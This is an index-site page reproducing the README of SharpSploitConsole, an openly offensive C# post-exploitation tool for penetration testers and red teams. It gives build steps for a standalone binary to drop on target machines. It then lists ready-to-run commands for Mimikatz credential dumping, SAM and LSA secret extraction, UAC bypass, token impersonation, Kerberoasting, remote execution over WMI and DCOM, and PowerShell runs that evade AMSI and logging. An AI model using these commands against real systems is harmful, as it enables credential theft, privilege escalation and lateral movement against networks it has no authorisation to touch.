Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/anthemtotheego/SharpSploitConsole
https://github.com/anthemtotheego/SharpSploitConsole
Last synced: 3 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/anthemtotheego/SharpSploitConsole
- Owner: anthemtotheego
- Created: 2018-10-02T18:57:46.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2022-02-21T15:12:26.000Z (over 2 years ago)
- Last Synced: 2024-04-08T12:34:46.203Z (7 months ago)
- Language: C#
- Size: 4.22 MB
- Stars: 178
- Watchers: 11
- Forks: 38
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# SharpSploitConsole
Console Application designed to interact with SharpSploit released by @cobbr_io > https://github.com/cobbr/SharpSploit
SharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community and combines it into one sweet DLL. It's awesome so check it out!
Description
============
SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target sytem and run over a non-interactive shell (such as beacon).This concept can be applied to many C# binaries. For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn't rely on the System.Management.Automation.dll on the target system.
Lastly, I am aware there are probably thousands of ways to make this better, faster, cooler, stealthier etc. So please free to let me know....in a nice way. :) I also plan to add more modules and improve others.
Contact at:
- Twitter: @anthemtotheego or @g0ldengunsec**Before submitting issues, this tool may not always be updated actively. I encourage you to borrow, add, mod, and/or make your own. Remember, all the awesome code out there (and there is a lot) can be taken/modified to create your own custom tools.**
![Alt text](/sharpsploitimg1.PNG?raw=true "SharpSploitConsole")
![Alt text](/sharpsploitimg2.PNG?raw=true "")Setup - Quick and Dirty
==============================**Note: I used Windows 10, Visual Studio 2017 - mileage may vary**
1. Download SharpSploit tool from https://github.com/cobbr/SharpSploit.git
2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for correct architecture) - Should see drop down with Any CPU > Click on it and open Configuration Manager > under platform change to desired architecture and select ok.
3. Download SharpSploitConsole tool and open up SharpSploitConsole.sln
4. Copy both SharpSploit.dll and System.Management.Automation.dll found in SharpSploit/bin/x64/Debug directory into SharpSploitConsole/bin/x64/Debug folder
5. Next we will set up visual studio to embed our DLL's into our exe so we can just have a single binary we can run on our target machine. We will do this by doing the following:
In visual studio:
a. Tools > NuGet Package Manager > Package Manager Console
b. Inside console run:Install-Package Costura.Fody
c. Open up notepad and paste the following code below and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj, properties folders.
6. Inside visual studio, right click References on the righthand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLL's, select them and add them.
7. Compile, drop binary on target computer and have fun.
Examples
========Note: All commands are case insensitive
By default all commands can be taken in as command line args, they will be executed and the program will exit (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.
Start interactive console mode:
```Interact```
Mimikatz all the things (does not run DCSync) - requires admin or system:
```Mimi-All```
Runs a specific Mimikatz command of your choice - requires admin or system:
```Mimi-Command privilege::debug sekurlsa::logonPasswords```
Runs the Mimikatz command privilege::debug sekurlsa::logonPasswords - requires admin or system:
```logonPasswords```
Runs the Mimikatz command to retrieve Domain Cached Credentials hashes from registry - requires admin or system:
```LsaCache```
Runs the Mimikatz command to retrieve LSA Secrets stored in registry - requires admin or system:
```LsaSecrets```
Retrieve password hashes from the SAM database - requires admin or system:
```SamDump```
Retrieve Wdigest credentials from registry - requires admin or system:
```Wdigest```
Retrieve current user:
```whoami```
```Username```
Impersonate system user - requires admin rights:
```GetSystem```
Impersonate system user - Impersonate the token of a specified process, requires pid - command requires admin rights:
```Impersonate 2918```
Bypass UAC - requires binary | command | path to binary - requires admin rights:
```BypassUAC cmd.exe ipconfig C:\Windows\System32\```
```BypassUAC cmd.exe "" C:\Windows\System32\```
Ends the impersonation of any token, reverts back to initial token associated with current process:
```RevertToSelf```
Retrieve current working directory:
```CurrentDirectory```
Retrieve current directory listing:
```DirectoryListing```
Changes the current directory by appending a specified string to the current working directory:
```ChangeDirectory SomeFolder```
Retrieve hostname:
```Hostname```
Retrieve list of running processes:
```ProcessList```
Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin:
```ProcDump 2198 C:\Users\Username\Desktop memorydump.dmp```
Retrieve registry path value, requires full path argument:
```ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumber```
Write to registry, requires full path argument and value argument:
```WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1```
Retrieve users of local group remotely, requires computername | groupname | username | password:
```NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!```
```NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!```
Retrieve local groups remotely, requires computername | username | password:
```NetLocalGroups computerName domain\username P@55w0rd!```
```NetLocalGroups 192.168.1.20 .\username P@55w0rd!```
Retrieve current logged on users remotely, requires computername | username | password:
```NetLoggedOnUsers computerName domain\username P@55w0rd!```
```NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!```
Retrieve user sessions remotely, requires computername | username | password:
```NetSessions computerName domain\username P@55w0rd!```
```NetSessions 192.168.1.20 .\username P@55w0rd!```
Ping systems, requires computernames:
```Ping computer1 computer2 computer3 computer4```
Port scan systems, requires computername | ports:
```PortScan computer1 80 443 445 22 23```
Get Domain Users, Grabs specified (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:
```GetDomainUsers```
Get Domain Groups, Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:
```GetDomainGroups```
```GetDomainGroups -target "Domain Admins"```
Get Domain Computers, Grabs specified (or all) computer objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:
```GetDomainComputers```
Perform Kerberoasting, Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target
```Kerberoast```
```Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService```
Run command remotely via WMI, requires computername | username | password | command - requires admin:
```WMI computer1 domain\username P@55w0rd! ```
```WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc ```
Run command remotely via DCOM, requires computername | command | directory | params - requires admin:
```DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc ```
Run shell command:
```Shell ipconfig /all```
Run powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging:
```Powershell -noP -sta -w 1 -enc ```
# Currently available options (more to come)
- **Interact** : Starts interactive console mode, if you are interacting remotely you may not want to use this option
- **Mimi-All** : Executes everything but DCSync, requires admin
- **Mimi-Command** : Executes a chosen Mimikatz command
- **logonPasswords** : Runs privilege::debug sekurlsa::logonPasswords
- **LsaCache** : Retrieve Domain Cached Credentials hashes from registry
- **LsaSecrets** : Retrieve LSA secrets stored in registry
- **SamDump** : Retrieve password hashes from the SAM database
- **Wdigest** : Retrieve Wdigest credentials from registry
- **whoami** : Retrieve current user
- **GetSystem** : Impersonate system user, requires admin rights
- **Impersonate** : Impersonate the token of a specified process, requires pid - command requires admin rights.
- **BypassUAC** : Bypass UAC, requires binary | command | path to binary - requires admin rights
- **RevertToSelf** : Ends the impersonation of any token, reverts back to initial token associated with current process
- **CurrentDirectory** : Retrieve current working directory
- **DirectoryListing** : Retrieve current directory listing
- **ChangeDirectory** : Changes the current directory by appending a specified string to the current working directory
- **Hostname** : Retrieve hostname
- **ProcessList** : Retrieve list of running processes
- **ProcDump** : Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin
- **Username** : Retrieve current username
- **ReadRegistry** : Retrieve registry path value, requires full path argument
- **WriteRegistry** : Write to registry, requires full path argument | value
- **NetLocalGroupMembers** : Retrieve users of local group remotely, requires computername | groupname | username | password
- **NetLocalGroups** : Retrieve local groups remotely, requires computername | username | password
- **NetLoggedOnUsers** : Retrieve current logged on users remotely, requires computername | username | password
- **NetSessions** : Retrieve user sessions remotely, requires computername | username | password
- **Ping** : Ping systems, requires computernames"
- **PortScan** : Port scan systems, requires computername | ports
- **GetDomainUsers** : Grabs specified (or all) user objects in the target domain, by default will use current user context
- **GetDomainGroups** : Grabs specified (or all) group objects in the target domain, by default will use current user context
- **GetDomainComputers** : Grabs specified (or all) computer objects in the target domain, by default will use current user context
- **Kerberoast** : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context
- **WMI** : Run command remotely via WMI, requires computername | username | password | command | requires admin
- **DCOM** : Run command remotely via DCOM, requires computername | command | directory | params - requires admin
- **Shell** : Run a shell command
- **Powershell** : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging